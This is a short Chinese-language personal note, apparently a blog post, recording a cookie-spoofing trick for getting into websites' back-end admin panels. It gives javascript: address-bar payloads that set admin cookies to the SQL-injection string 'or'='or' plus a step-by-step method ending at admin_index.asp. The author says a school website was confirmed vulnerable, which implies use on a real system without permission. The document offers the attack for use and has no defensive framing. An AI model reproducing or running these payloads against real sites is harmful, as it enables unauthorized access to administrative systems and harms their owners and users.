javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert (document.cookie="adminpass="+escape("'or'='or'"));javascript:alert (document.cookie="admindj="+escape("1"));
知识的海洋真是无穷尽的,关键是找到适合自己的位置,并努力做好它。
今天听同学说可以采用cookie欺骗方式登录网站的后台管理系统,具有此漏洞的网站可以采用这个方式进入,学校的的网站证实也存在此漏洞。记录如下:
方法如下,1,打开后台管理页面。
2,将上述javascript代码输入到浏览器地址栏中。
3,在域名后面输入admin_index.asp页面,成功进入。